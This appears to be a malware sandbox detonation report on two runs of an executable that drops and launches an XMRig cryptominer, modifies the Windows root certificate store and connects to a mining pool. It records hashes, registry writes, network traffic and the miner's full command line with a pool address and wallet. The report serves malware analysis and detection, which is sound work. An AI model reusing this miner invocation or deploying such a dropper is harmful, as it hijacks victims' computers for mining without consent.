Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1784s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4120 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 4120 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/5008-14-0x0000027866A10000-0x0000027866A30000-memory.dmp

memory/5008-15-0x0000027866B60000-0x0000027866B80000-memory.dmp

memory/5008-16-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-19-0x0000027866BA0000-0x0000027866BC0000-memory.dmp

memory/5008-18-0x0000027866B80000-0x0000027866BA0000-memory.dmp

memory/5008-17-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-20-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-21-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-23-0x0000027866BA0000-0x0000027866BC0000-memory.dmp

memory/5008-22-0x0000027866B80000-0x0000027866BA0000-memory.dmp

memory/5008-24-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-25-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-26-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-27-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-28-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-29-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-30-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-31-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-32-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-33-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-34-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-35-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-36-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-37-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-38-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-39-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-40-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-41-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-42-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-43-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-44-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-45-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-46-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-47-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-48-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-49-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-50-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-51-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-52-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-53-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-54-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-55-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-56-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-57-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-58-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-59-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-60-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-61-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-62-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-63-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-64-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-65-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-66-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-67-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-68-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-69-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-70-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-71-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-72-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-73-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-74-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-75-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-76-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-77-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-78-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-79-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-80-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-81-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

memory/5008-82-0x00007FF7CD310000-0x00007FF7CDE13000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:40

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2512 wrote to memory of 3860 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 2512 wrote to memory of 3860 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 g.bing.com udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
